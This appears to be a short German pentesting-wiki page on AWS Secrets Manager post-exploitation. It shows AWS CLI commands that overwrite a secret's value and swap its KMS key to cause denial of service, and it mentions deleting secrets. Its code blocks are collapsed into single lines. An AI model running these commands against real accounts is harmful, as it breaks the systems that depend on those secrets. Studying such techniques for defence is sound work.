AWS - Secrets Manager Post Exploitation
Secrets Manager
Für weitere Informationen siehe:
pageAWS - Secrets Manager EnumGeheime lesen
Die Geheimnisse selbst sind sensible Informationen, überprüfen Sie die Privilege-Escalation-Seite, um zu erfahren, wie man sie liest.
DoS Ändern des Geheimniswerts
Durch Ändern des Werts des Geheimnisses könnten Sie alle Systeme, die von diesem Wert abhängen, DoS-angreifen.
Beachten Sie, dass vorherige Werte ebenfalls gespeichert sind, daher ist es einfach, zum vorherigen Wert zurückzukehren.
```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS Ändern des KMS-Schlüssels ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Löschen von Geheimnissen
Die minimale Anzahl von Tagen, um ein Geheimnis zu löschen, beträgt 7.
Last updated